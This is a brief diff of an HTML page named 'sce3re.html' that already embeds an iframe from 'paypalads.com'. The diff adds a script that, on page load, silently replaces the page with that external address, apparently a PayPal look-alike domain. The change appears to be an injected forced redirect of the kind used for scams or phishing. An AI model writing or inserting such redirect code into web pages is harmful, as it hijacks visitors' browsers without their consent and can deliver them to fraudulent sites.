--- a/sce3re.html
+++ b/sce3re.html
@@ -25,7 +25,10 @@ iframe {
 }
 </style>
 
-
+<script>
+location.replace("https://paypalads.com/gyn");
+</script>
+  
 
 <div class="video-container">
   <iframe allowfullscreen="" scrolling="no" src="https://paypalads.com/gyn"></iframe>
